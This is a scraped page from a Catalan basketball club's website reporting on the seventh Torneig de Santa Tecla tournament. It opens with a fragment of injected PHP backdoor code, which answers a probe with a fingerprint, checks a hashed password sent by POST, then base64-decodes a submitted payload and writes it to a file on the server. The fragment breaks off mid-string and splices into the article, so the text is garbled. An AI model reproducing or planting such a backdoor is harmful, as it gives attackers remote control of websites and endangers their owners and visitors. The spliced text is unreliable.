function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Torneig de Santa Tecla, una altra edició d'èxit - Tgn Bàsquet Club -

El Torneig de Santa Tecla, una altra edició d’èxit

By
Updated: setembre 14, 2015

El Torneig de Santa Tecla ha complert la seva setena edició. El campionat de bàsquet de les Festes de Tarragona ha consolidat la seva existència amb els partits que s’han celebrat aquest cap de setmana en què han participat equips cadets, júniors i sèniors femenins de la ciutat, la demarcació i la resta de Catalunya i l’Estat. Ha estat un cap de setmana on s’ha pogut veure, per exemple, l’evolució del conjunt de Copa Catalunya, que debutava davant el seu públic al pavelló del Sagrat Cor. Cal destacar el bon paper del sènior B, que ha guanyat els dos partits amb molta claredat, demostrant que el treball comença a donar fruits a l’espera de l’inici del campionat. Així, s’han disputat vint partits de bàsquet que han servit per ultimar la preparació dels diferents equips de cada categoria abans de la competició oficial. Aquest és un dels grans atractius del Torneig, el fet que serveixi d’última posada a punt pels conjunts en un ambient competitiu.

“Fem una valoració molt positiva d’aquesta edició del Torneig de Santa Tecla perquè hem pogut continuar responent als dos grans objectius amb els quals vam crear aquest campionat fa set anys: potenciar el bàsquet femení i donar una visualització en l’àmbit de la ciutat aprofitant el marc de les Festes de Tarragona i donar uns mitjans de preparació, en forma de partits de pretemporada, als equips del club. El Torneig ha funcionat molt bé pel que fa a cadets, júniors i sèniors. Cal destacar la bona sintonia amb els clubs que ens visiten per aquesta cita habitualment i també amb la resta de la zona que també han participat”, diu Jordi Crespo, responsable del Torneig.

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *